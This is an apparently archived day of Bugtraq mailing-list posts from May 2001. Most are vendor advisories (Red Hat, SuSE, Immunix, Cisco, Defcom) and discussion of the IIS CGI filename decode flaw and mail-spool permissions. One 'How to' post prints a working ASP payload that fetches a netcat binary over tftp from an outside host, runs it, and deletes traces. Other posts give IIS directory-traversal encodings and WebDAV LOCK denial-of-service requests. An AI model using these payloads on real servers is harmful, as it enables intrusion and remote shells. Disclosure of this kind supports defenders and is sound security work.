Re: Personal Web Sharing remote stop

2001-05-17 Thread Peter Bierman

At 12:30 PM +0200 5/15/01, Terje Bless wrote:
On 10.05.01 at 07:32, Jass Seljamaa [EMAIL PROTECTED] wrote:

Personal Web Sharing Remote Stop.
Solution: Nothing. Vendor not contacted, I\'m sure he\'s aware of that.

Since Apple *still* aren't reading Bugtraq I'm going to report this to
their bug tracking system. I'll refer them to you if you don't mind?

I might not read every message on Bugtraq (who can?) but I skim the subjects looking 
for Mac OS X topics. And I doubt I'm the only Mac OS X engineer that does this.

You should still send bug reports directly to Apple.

BTW, if anyone has contacts at Apple _please_ bug them about starting to
take security seriously!

We do. We might not do exactly what _you_ want though. 

Apple's World Wide Developer Conference is next week in San Jose. There might be some 
Mac OS X security news there...


Re: Personal Web Sharing remote stop

2001-05-17 Thread Terje Bless

On 16.05.01 at 14:41, Peter Bierman [EMAIL PROTECTED] wrote:

At 12:30 PM +0200 5/15/01, Terje Bless wrote:
Since Apple *still* aren't reading Bugtraq [...]

I might not read every message on Bugtraq (who can?) but I skim the
subjects looking for Mac OS X topics. And I doubt I'm the only Mac OS X
engineer that does this.

Great! That's a huge step up from what the situation appeared to be. But
it's still not good that Apple to all appearances has no Point of Contact
for security issues, no Advisory channel, doesn't send advisory-ish things
to Bugtraq (especially for things that were reported here in the first
place), doesn't respond (AFAICT) to security issues reported as bugs
using normal channels, doesn't have a Security Issue option in the
BugReporter, doesn't provide their own security-related mailinglist, and
releases stealth security fixes.

All of which have been reported as bugs in BugReporter (after the worst
b0rkenness in /that/ horror was fixed this winter).

You should still send bug reports directly to Apple.

I have, I do, and I will. Repeatedly! :-)

BTW, if anyone has contacts at Apple _please_ bug them about starting to
take security seriously!

We do. We might not do exactly what _you_ want though.

Fair enough.

Still, I insist on retaining my right to disagree that your security
strategy is a good or even remotely complete one. If I ever found such a
beast I might change my mind, but digging around Apple for security related
info is an excercise in futility.

I admin all kinds of platforms, and right now, Apple is the one sore thumb
that sticks out as having no visible security strategy at all (don't the
sales drones realize the potential for PR disaster inherent in that
situation?). All other major vendors have /some/ kind of security channel
and at a minimum a token appearance on Bugtraq or similar. Apple gives the
appearance of having it's head in the sand...

  I bugged Wilfredo about this before he left and he said he'd pass it on;
  did anyone pick up that ball? Public info hasn't changed, but maybe
  something is happening internally?

Apple's World Wide Developer Conference is next week in San Jose. There
might be some Mac OS X security news there...

Wish I could be there, but alas... :-(

I don't suppose key events will be streamed?


Good to see you're still alive. Last time I saw a life-sign from you you
were futzing with the Rhapsody intaller or somesuch before the first
release. :-)

UNICODE2 (2708)

2001-05-17 Thread Security COnfera

Hash: SHA1

Hi all

I tested Microsoft IIS CGI Filename Decode Error Vulnerability
on Personal Web Server v1.0 and v3.0 on win98 and is vulnerable.

i use /scripts/..%255c..%255c

 %%35c , %%35%63 , %25%35%63 

Kachlik Jan

Version: PGPfreeware 6.5.8 for non-commercial use


Re: RH7.0: man local gid 15 (man) exploit

2001-05-17 Thread PJ

FYI, still doesn't work on Slackware 7.1

$ man -S : blah
No manual entry for blah

$ man -S 
blah: nothing appropriate

I have tried the other command to try to get man to segfault with a
supplied arguement, still nothing.  

$ man -S `perl -e 'print : x 100'` blah
No manual entry for blah

On Wed, 16 May 2001, Stephen Shirley wrote:

   The info posted to get man to seg fault is slightly incorrect. You
 need to supply some text as the name of a man page - otherwise man will
 reject all input. The number of :'s is irrelevat too - one is enough.
 man -S : blah
 will cause a seg fault. This has been confirmed on debian 2.2 woody, and I
 submitted a patch to fix it. The new version is in unstable - ver
 2.3.18-2. From the changelog of 2.3.18-2:
   * man would segfault if the argument to -S contained only colons, and
 incidentally treated an empty argument to -S wrongly. Both cases now
 use the standard list of sections instead (thanks, Colin Phipps and
 Stephen Shirley; closes: #97553, #97566).
 My mom had Windows at work and it hurt her eyes real bad


My brain needs a new OS - it can't stay up for much longer than 24 hours without a 

Re: Solaris /usr/bin/mailx exploit (SPARC)

2001-05-17 Thread Greg A. Woods

[ On Tuesday, May 15, 2001 at 14:47:02 (-0700), Tobias J. Kreidl wrote: ]
 Subject: Re: Solaris /usr/bin/mailx exploit (SPARC)

 Andrew Hilborne [EMAIL PROTECTED] wrote on
 Tue, 15 May 2001 14:15:45 +0100:
  Just how do you force 0600 on mailboxes which don't exist (many MUAs
  remove empty mailboxes?)
  Since you cannot easily do this, at the very least a malicious user
  should be able to steal other users' mail. I think.
 1) The permissions 1777 on /var/mail should allow empty mailboxes to
 remain under most circumstances.  One should be careful what
 IMAP and POP services are running on your machine and how
 they handle this.
 2) When a new user account is first established, it is imperative that
 a mailbox be created at that time with the proper ownerships and file 
 3) A cron job can help monitor any discrepancies between existing and 
 desired file attributes of mailboxes in /var/mail and rectify them on 
 the fly.

That's all true, in so far as it goes, but it does leave the system open
to far more risk than is necessary in that the local delivery agent must
still run as root.

Having implemented what I hope to be a secure and portable
fopen_as_user() function I can assure you that even the apparently
simple job of doing local delivery from a privileged position isn't
really all that simple at all.  If the calling process isn't expecting
to exit within such a function then you have to fork() and with careful
error checking and few comments the resulting code is well over 200
lines long!

Indeed if you're going to go to all the trouble of pre-creating
mailboxes and ensuring that empty ones are left behind by all mail
reading agents then it's trivial to implement setgid-mail delivery on
even systems which don't allow ordinary users to use chown(2).
I.e. it's trivial, even on such systems, to avoid having to use root
privileges in any part of the local mail system!

In my estimation the risk resulting from a successfull group-ID mail
compromise is still almost infinitely less than the risk of a root
compromise, regardless of what the system involved is used for!

Greg A. Woods

Planix, Inc. [EMAIL PROTECTED];   Secrets of the Weird [EMAIL PROTECTED]

Re: NSFOCUS SA2001-02 : Microsoft IIS CGI Filename Decode Error Vulnerability

2001-05-17 Thread Nsfocus Security Team

Hi -

Here we want to explain why exploitation of this vulnerability fails in 
some cases.

The vulnerability exists in both IIS 4.0 and IIS 5.0, but exploitation
of it would fail for some factors.

1. Why NT 4 SP6(SP6a) is not affected?

   That's because SP6(a) will perform a check for the existence of 
   requested file after the first decoding. Attack will fail for files
   don not actually exist.
   But this check of SP6 seems to be just a temporary fix to address
   some certain vulnerability. And it was removed in some following 
   Thus, if you have only applied SP6(a) for your NT 4, you would not be
   affected by this vulnerability.

2. Will systems with patch provided by MS00-078(MS00-057) be affected?

   MS00-078 and MS00-057 provide the same patch, which will perform a
   check of filename for .\ and ./ after the first decoding. In case
   that such characters exist, request would be denied. Thus, it only 
   casually addresses UNICODE vulnerability. By covering ./ or .\ after 
   the first decoding, an attacker can still successfully make use of 
   Decoding error vulnerability.
   For example:

   will be converted into 
   after the first decoding. Thus the request can bypass the security 

   will be converted into 
   after the first decoding. Thus the attack fails since the decoded 
   name contains  './'.

3. Will systems with patch provided by MS00-086 be affected?

   The patch provided by MS00-086 successfully addressed the UNICODE
   But Microsoft has updated the patches for some times. First versions
   will provide filename check for some dangerous characters like '%'
   or '' after the first decoding. Thus, you will not be affected 
   by Decoding error vulnerability if you apply these versions.
   But Microsoft remove the check again in the final version of the 
   patch, apply which will make your system affected.

Nsfocus Security Team [EMAIL PROTECTED]

def-2001-26: IIS WebDav Lock Method Memory Leak DoS

2001-05-17 Thread Peter Gründl

  Defcom Labs Advisory def-2001-26

   IIS WebDav Lock Method Memory Leak DoS

Author: Peter Gründl [EMAIL PROTECTED]
Release Date: 2001-05-17
=[Brief Description]=-
The WebDav extensions for Internet Information Server 5.0 contain a
flaw that could allow a malicious user to consume all available memory
on the server.

=[Affected Systems]=--
- httpext.dll versions prior to 0.9.3940.21 (Windows 2000 SP2)

--=[Detailed Description]=
The lock method contains a memory leak that will trigger if you send
it continous requests for non-existing files. Eg.

LOCK /aa.htw HTTP/1.0

Eventually the server will run out of memory and run really slow, you
might argue that the server will then crash, reboot and return to
normal again, but there are a few things that can be done to determine
when you get close to filling up the servers memory, and then it is
just a matter of stopping, and the server won't free the memory. One
way is to combine the attack with asp executions, eg.

GET /iisstart.asp?uc=a HTTP/1.0

which ofcourse requires the presence of iisstart.asp (but this is
just an example). The script will return execution errors when it
runs out of temporary space on the server to execute the .asp script
and that's when the server is almost out of memory.

The problem has been corrected in httpext.dll v.0.9.3940.21, which is
packaged with Windows 2000 Service Pack 2 and according to Microsoft:

it will ship with each IIS5 hotfix that we release going forward
 (and will be available for SP0, SP1, and SP2+.)

You can find Service Pack 2 on Microsofts webpage at:

-=[Vendor Response]=--
This issue was brought to the vendor's attention on the 3rd of March,
2001, and the vendor released a patch on the 16th of May.

This release was brought to you by Defcom Labs


Re: Solaris /usr/bin/mailx exploit (SPARC)

2001-05-17 Thread Casper Dik

Indeed if you're going to go to all the trouble of pre-creating
mailboxes and ensuring that empty ones are left behind by all mail
reading agents then it's trivial to implement setgid-mail delivery on
even systems which don't allow ordinary users to use chown(2).
I.e. it's trivial, even on such systems, to avoid having to use root
privileges in any part of the local mail system!

Dependign on which loss of features you're willing to accept, it's
usually not practical to run mail delivery as a non-privileged user;
currently, we need to do deliver as superuser because of the
actual delivery runs as the destination user.

If you don't run delivery as the targeted user, you can have unrestricted
.forward files  (those are a risk in themselves but tools like procmail
cannot easily be run under an unprivilegd accoutn on behalf of a user.

AS things stand today, there doesn't seem to be any reason to continue
the use of set-gid mail in Solaris, except that some code changes will be
necessary (or mailboxes will be created mode 660, group pwd-pw_gid


IIS CGI Filename decode error = financial industry server vulnerability

2001-05-17 Thread Curt Wilson

I work with a company that has a financial services vendor that ships
their customized IIS4 systems with everyone/full control on C: or else
it breaks the application. Of course, these perms reach the winnt/system32
dir, but I used cacls to restrict winnt/system32/*.exe from the
IUSR account with success. The only thing funky about this solution,
is that when cmd.exe is restricted in such a manner, the user 
(if using IE) receives a challenge-response, allowing at least some
attempt to brute force the admin account (vendor sets very weak default

This particular vendor supplies a lot of credit unions. They are
currently testing the MS patch to determine if it will function
properly on their customized version of IIS 4. The system is designed
to run behind a decent firewall such as the Cisco PIX, and I feel
that this fact has created a false sense of black box security.
The defense-in-depth posture of this company is somewhat weak, but
one of their managers shows a lot of promise in terms of tightening
the companys security stance.

It seems that most of the exploit code and examples focuses on 
using cmd.exe. In this particular everyone/full control scenario,
there are various other executables are available such as route, net, 
tftp, findstr, netstat, tracerte, ipconfig, ping, etc. that can receive
parameters and for some (tftp, ftp, telnet, ping) open up a back-channel
in a stateful firewall unless outgoing packets are filtered. It appears
that routes can be modified as well but I was not successful in my 
particular test.

Like unicode and other exploits of this nature, it seems pretty easy for
an attacker to set up a tftp server and craft a command line to retrieve
something like netcat or a trojan from an external site and store it in a
writeable area. Internal networks could really be screwed, esp with
something like Sir Dystics SMBrelay being used.

I won't reveal any more information at this point about the particular
vendor, until they release their results or their own customized patch. I am
expecting some type of result from them within 12 hours of this message.
This vendors security notification service has been pretty slow in the past,
but attackers don't wait.

If you are a credit union with an in-house home banking service, please
contact me and we can discuss further if necessary.

| Curt R. Wilson   *   Netw3 Consulting  *|
|Internet Security, Networking, PC tech,  WWW hosting |
| Netw3 Security Reading Room :  |
|  Serving Southern Illinois locally and the world virtually  |  

Microsoft IIS CGI Filename Decode Error V - How to

2001-05-17 Thread Adriano Dias

Thats what I did:

then i ran

following is a copy of the f.asp:

--cut here-
Set fs = CreateObject(Scripting.FileSystemObject)
Set drv = fs.Drives
dmax = 
dmac = 0
For each d in drv
If d.Driveletter  A And d.IsReady Then
If d.AvailableSpace  dmac then
dmac = d.AvailableSpace
dmab = d.DriveType
dmaa = d.TotalSize
dmad = d.SerialNumber
dmax = d.DriveLetter
End If
End If
filename = server.mappath(dl.bat)
Set tf = fs.CreateTextFile(filename, True)
tf.WriteLine(@echo off)
tf.WriteLine(cd \Inetpub\scripts)
tf.WriteLine(tftp.exe -i get ncx99.exe
tf.WriteLine(if not exist ncx99.exe goto startDL)
tf.WriteLine(start /w nc0.exe)
tf.WriteLine(attrib TFTP* -r)
tf.WriteLine(attrib nc0.exe -r)
tf.WriteLine(del TFTP*)
dim command
dim wshShell
command = server.mappath(dl.bat) dmax
On Error Resume Next
Set wshShell = CreateObject(WScript.Shell)
wshShell.Run (command)
If Err Then
Set objFSO = Server.CreateObject(scripting.filesystemobject)
pathname = server.mappath(dl.bat)
objFSO.DeleteFile pathname
Set objFSO = Nothing
Response.Write |  dmax  *  dmab  *  dmac  *  dmaa  * 
End If

---cut here--

[RHSA-2001:063-02] Updated gnupg packages available

2001-05-17 Thread bugzilla

   Red Hat, Inc. Red Hat Security Advisory

Synopsis:  Updated gnupg packages available
Advisory ID:   RHSA-2001:063-02
Issue date:2001-05-02
Updated on:2001-05-16
Product:   Red Hat Linux
Keywords:  gnupg klima rosa
Cross references:  
Obsoletes: RHSA-2000:131

1. Topic:

Updated gnupg packages are now available for Red Hat Linux 6.2, 7, and 7.1.
 These updates address a potential vulnerability which could allow an
attacker to compute a user's secret key.

2. Relevant releases/architectures:

Red Hat Linux 6.2 - alpha, i386, sparc

Red Hat Linux 7.0 - alpha, i386

Red Hat Linux 7.1 - i386

3. Problem description:

By modifying an unsuspecting user's private keyring, an attacker can cause
a user to generate incorrect signatures for data.  If a user generates both
a correct and an incorrect signature for the same data, the different
signatures can be used to compute the user's secret key.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which are
not installed but included in the list will not be updated.  Note that you
can also use wildcards (*.rpm) if your current directory *only* contains the
desired RPMs.

Please note that this update is also available via Red Hat Network.  Many
people find this an easier way to apply updates.  To use Red Hat Network,
launch the Red Hat Update Agent with the following command:


This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system.

5. Bug IDs fixed ( for more info):

33473 - secret keyring compromise leading to secret key disclosure

6. RPMs required:

Red Hat Linux 6.2:





Red Hat Linux 7.0:




Red Hat Linux 7.1:



7. Verification:

MD5 sum   Package Name
89938a0670ba2588cf0c109c05b2a604 6.2/en/os/SRPMS/gnupg-1.0.5-0.6.x.src.rpm
338782bd895ab81fb7e84d36005fa95e 6.2/en/os/alpha/gnupg-1.0.5-0.6.x.alpha.rpm
3ff455f2312c083994ab7e9c7369e325 6.2/en/os/i386/gnupg-1.0.5-0.6.x.i386.rpm
bae79560d0a6cde8746492d15a57ec19 6.2/en/os/sparc/gnupg-1.0.5-0.6.x.sparc.rpm
3a7fed8e807ccb992ce0e05d0a7bbdff 7.0/en/os/SRPMS/gnupg-1.0.5-1.src.rpm
3b84f8fcdd97846ec3435bcdc0a8e4c5 7.0/en/os/alpha/gnupg-1.0.5-1.alpha.rpm
c5633eb35d1dc7c753da7ea850eba864 7.0/en/os/i386/gnupg-1.0.5-1.i386.rpm
3a7fed8e807ccb992ce0e05d0a7bbdff 7.1/en/os/SRPMS/gnupg-1.0.5-1.src.rpm
c5633eb35d1dc7c753da7ea850eba864 7.1/en/os/i386/gnupg-1.0.5-1.i386.rpm

These packages are GPG signed by Red Hat, Inc. for security.  Our key
is available at:

You can verify each package with the following command:
rpm --checksig  filename

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the md5sum with the following command:
rpm --checksig --nogpg filename

8. References:

Copyright(c) 2000, 2001 Red Hat, Inc.

[RHSA-2001:060-04] Updated Kerberos 5 packages available

2001-05-17 Thread bugzilla

   Red Hat, Inc. Red Hat Security Advisory

Synopsis:  Updated Kerberos 5 packages available
Advisory ID:   RHSA-2001:060-04
Issue date:2001-04-26
Updated on:2001-05-16
Product:   Red Hat Linux
Keywords:  kerberos ftpd glob
Cross references:  
Obsoletes: RHSA-2001:025

1. Topic:

Updated Kerberos 5 packages are now available for Red Hat Linux 6.2, 7,
and 7.1.  These updates close a potential vulnerability present in the
gssapi-aware ftpd included in the krb5-workstation package.

2. Relevant releases/architectures:

Red Hat Linux 6.2 - alpha, i386, sparc

Red Hat Linux 7.0 - alpha, i386

Red Hat Linux 7.1 - i386

3. Problem description:

By use of a carefully-crafted authentication request, a malicious client
could exploit a vulnerability made possible by a missing bounds check.  A
malicious client could also overflow the buffer space used by the server
for performing globbing operations.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which are
not installed but included in the list will not be updated.  Note that you
can also use wildcards (*.rpm) if your current directory *only* contains the
desired RPMs.

Please note that this update is also available via Red Hat Network.  Many
people find this an easier way to apply updates.  To use Red Hat Network,
launch the Red Hat Update Agent with the following command:


This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system.

5. Bug IDs fixed ( for more info):

34372 - krb5-server-1.2.2-4.alpha.rpm i386 compatibility
35978 - gssftp can be segfaulted remotely, possibly exploitable

6. RPMs required:

Red Hat Linux 6.2:





Red Hat Linux 7.0:




Red Hat Linux 7.1:



7. Verification:

MD5 sum   Package Name
6ce2742e193047a719701d83b7178c59 6.2/en/os/SRPMS/krb5-1.1.1-27.src.rpm
f21e8e6beb5a91ebca4b00af0d1daf10 6.2/en/os/alpha/krb5-configs-1.1.1-27.alpha.rpm
1b2fd96e0f9d584b8a7ab16ff8d37b7b 6.2/en/os/alpha/krb5-devel-1.1.1-27.alpha.rpm
ab736f348078aee145f243f74a964be7 6.2/en/os/alpha/krb5-libs-1.1.1-27.alpha.rpm
c5fa26e257ad18d1feb917f78d4af0ad 6.2/en/os/alpha/krb5-server-1.1.1-27.alpha.rpm

SuSE Security Announcement: kernel (SuSE-SA:2001:18)

2001-05-17 Thread Roman Drahtmueller



SuSE Security Announcement

Date:   Thursday, May 17th, 2000 16:40 MET
Affected SuSE versions: (6.1, 6.2), 6.3, 6.4, 7.0, 7.1
Vulnerability Type: local root compromise
Severity (1-10):7
SuSE default package:   yes
Other affected systems: All Linux systems using a v2.2 kernel

Content of this advisory:
1) security vulnerability resolved: kernel
   Problem, Workaround, Recommended solution, Instructions, Notes,
2) Acknowledgements
3) standard appendix (further information)


1)  The Problem, Workaround, Recommended solution, Instructions, Notes,

  The Problem:

The SuSE Linux kernel is a standard kernel, enhanced with a set of
additional drivers and other improvements, to suit the end-user's
demand for a great variety of drivers for all kind of hardware.
Multiple security vulnerabilities have been found in all Linux kernels
of version 2.2 before version 2.2.19. Most of the found errors allow
a local attacker to gain root privileges. None of the found errors
in the v2.2 linux kernel make it possible for a remote attacker to
gain access to the system or to elevate privileges from the outside
of the system. Thanks to Alan Cox, a summary of these errors can be
found at .
One of the numerous features in the SuSE Linux kernels is support
for reiserfs, a fast, stable logging filesystem. In addition to the
bugs listed at, the SuSE Linux kernel contains a fix
for a race condition between mmap(2) and write(2) in reiserfs that
can expose raw data from the disk to an unprivileged user (this
problem affected the ufs and ext2fs drivers in FreeBSD systems,
see FreeBSD-SA-01:30.ufs-ext2fs at
Please see the acknowledgement section 2) below for credits on
hunting these bugs and fixing them.


In order to solve the security problems, it is recommended to update
the kernel to version 2.2.19. Some problems (ptrace race) can be
circumvented by removing all suid and sgid bits from all binaries
in the system. Since this does not help against the other errors,
there is no appropriate temporary workaround against all of the
known problems except for locking out users with shell access.
Advanced Linux users may decide to compile and install the 2.2.19
kernel themselves by hand. This requires some experience on behalf
of the administrator and may not be all satisfying because the
standard 2.2.19 kernel does not contain some of the drivers that
are included in the SuSE kernel (ppp over ethernet, hardware health
monitoring (SMBus), reiserfs, graphics hardware acceleration
modules (DRI), ...).

  Recommended solution:

SuSE have chosen to provide update packages for the supported
distributions to the newest kernels instead of supplying patched
update kernel packages of the same kernel version in order to
avoid confusion about whether a vulnerable version of a kernel
is installed on a system or not. In addition to the clarifying
effect of a visible new kernel version that is known to have all
publically known security problems fixed, SAP LinuxLab
( have certified this release of the
SuSE-enhanced Linux kernel version 2.2.19 with respect to stability
and performance. We expect that our usership will benefit from this

Currently, only kernel update packages for the Intel i386 distributions
are available. The other supported architectures will have their kernel
updates in their respective update directories on our ftp server.

The SuSE Linux distribution 6.0 was shipped with a kernel of version 2.0.
All of the SuSE Linux distributions 6.1, 6.2, 6.3, 6.4, 7.0 and 7.1
are ready for a kernel of version 2.2.19. However, since update support
for the SuSE Linux distributions 6.0, 6.1 and 6.2 has been discontinued,
we strongly encourage all users of these distributions to update their
systems to a newer version of the SuSE Linux distribution. Please know
that the full distribution can be installed from our ftp server or one
of its mirrors. Experienced Linux users may choose to update their kernels
by hand to the latest version 2.2.19.

  Step-By-Step Installation Instructions:

The kernel of a Linux/Un*x system is the most critical component with
relation to stability, reliability and security. By consequence, an

IIS Decode

2001-05-17 Thread Aldo Albuquerque - Segurança de Sistemas


I can confirm this . It worked on our testbed.

NT 4.0 + IIS 3.0 + SP6a


Aldo Albuquerque - CCSA
Tempest Security Technologies -
CESAR - Centro de Estudos e Sistemas Avançados do Recife -

- Original Message -
From: Michael Vassiliadis
Sent: Thursday, May 17, 2001 12:52 AM
Subject: IIS Decode

There has been so much talk about this new diamond from m$, but NOONE
discovered that this also works on IIS 3!!!.

Please confirm...

Immunix OS Security update for minicom

2001-05-17 Thread Greg KH

Immunix OS Security Advisory

Packages updated:   minicom
Affected products:  Immunix OS 6.2, 7.0-beta, and 7.0
Bugs Fixed: immunix/1600
Date:   May 17, 2001
Advisory ID:IMNX-2001-70-020-01
Author: Greg Kroah-Hartman [EMAIL PROTECTED]

  zenith parsec found numerous format string bugs in the version
  of minicom that is included in all versions of Immunix OS.  See for more information on
  the exploit.  FormatGuard does not stop these bugs because minicom
  writes directly to the log files using vsprintf calls.

  The following packages fix most of the format string errors and
  disable the setuid bit on minicom.

Package names and locations:

  Precompiled binary package for Immunix 6.2 is available at:

  Source package for Immunix 6.2 is available at:

  Precompiled binary package for Immunix 7.0-beta and 7.0 is available at:

  Source package for Immunix 7.0-beta and 7.0 is available at:

md5sums of the packages:
  f4782dd69e6e5ee2e87307b4d65e00db  minicom-1.83.1-1.0.6x_StackGuard.i386.rpm
  a46af1037d8a122e747da2bf300bb4b8  minicom-1.83.1-1.0.6x_StackGuard.src.rpm

  8c09d3a50c741c590f41c9e9b954a2a2  minicom-1.83.1-8_imnx.i386.rpm
  e81d57a5d4f6e9e712901180cd22e593  minicom-1.83.1-8_imnx.src.rpm

Online version of all Immunix 6.2 updates and advisories:

Online version of all Immunix 7.0-beta updates and advisories:

Online version of all Immunix 7.0 updates and advisories:

  Ibiblio is graciously mirroring our updates, so if the links above are
  slow, please try:
  or one of the many mirrors available at:

 PGP signature

Cisco Security Advisory: Cisco Content Service Switch 11000 Series FTP Vulnerability

2001-05-17 Thread Cisco Systems Product Security Incident Response Team


Cisco Security Advisory: Cisco Content Service Switch 11000 Series FTP
Revision 1.0
For Public Release 2001 May 17 at 1500 UTC

The Cisco Content Service Switch (CSS) 11000 series switches do not enforce
the correct restrictions for a non privileged user opening an FTP
connection to them. All users with valid accounts can use the GET and PUT
commands to read and write any file on the system. This vulnerability
results in users gaining access to secure data.

This vulnerability is documented as Cisco bug ID CSCdt64682.

This advisory will be posted at

Affected Products
The CSS 11000 series switches (formerly known as Arrowpoint), consist of
the CSS 11050, CSS 11150 and CSS 11800 hardware platforms. They run the
Cisco WebNS Software.

All switches running the following WebNS software revisions are affected by
this vulnerability

   * earlier than 4.01B23s
   * earlier than 4.10B13s

No other Cisco product is currently known to be affected  by this

To determine your software revision, type version at the command line

A non privileged user (user account without administrative privileges) can
open an FTP connection to a CSS 11000 series switch and use GET and PUT FTP
commands, with no user level restrictions  enforced.

This vulnerability is documented as Cisco bug ID CSCdt64682, which requires
a CCO account to view.

A non privileged user can gain access to files on the switch they normally
would not have access to. This vulnerability can be minimized by
restricting ftp access to the CSS 11000 series switch.

Software Versions and Fixes
This vulnerability has been fixed in the following Cisco WebNS software

   * 4.01B23s or later
   * 4.10B13s or later

Obtaining Fixed Software

Cisco is offering free software upgrades to remedy this vulnerability for
all affected customers. Customers with service contracts may upgrade to any
software release containing the feature sets they have purchased.

Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained via the Software Center on Cisco's Worldwide Web site at

Customers without contracts should get their upgrades by contacting the
Cisco Technical Assistance Center (TAC). TAC contacts are as follows:

   * +1 800 553 2447 (toll free from within North America)
   * +1 408 526 7209 (toll call from anywhere in the world)
   * e-mail: [EMAIL PROTECTED]

See for additional TAC
contact information, including instructions and e-mail addresses for use in
various languages.

Give the URL of this notice as evidence of your entitlement   to a free
upgrade. Free upgrades for non contract customers must   be requested
through the TAC. Please do not contact either [EMAIL PROTECTED] or
[EMAIL PROTECTED] for software upgrades.

Don't configure non-privileged users on the switch. ( None are created by
default. )

Use the restrict command to enable or disable FTP access to the CSS. ( FTP
access is enabled by default.) (config)# restrict ftp

Access control lists can be applied to restrict FTP access to the Cisco CSS
device. Access control lists also affect traffic to the Virtual interface
of the Cisco CSS device, so must be applied with care. For further details
on configuring access lists please refer to the product documentation:

Exploitation and Public Announcements
The Cisco PSIRT is not aware of any public announcements or malicious use
of the vulnerabilities described in this advisory.

This vulnerability was reported to Cisco by a Cisco customer.

Status of This Notice: FINAL

This is a FINAL notice. Although Cisco cannot guarantee the accuracy of all
statements in this notice, all of the facts have been checked to the best
of our ability. Cisco does not anticipate issuing updated versions of this
notice unless there is some material change in the facts. Should there be a
significant change in the facts, Cisco may update this notice.


This notice will be posted on Cisco's Worldwide Web site at

In addition to Worldwide Web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and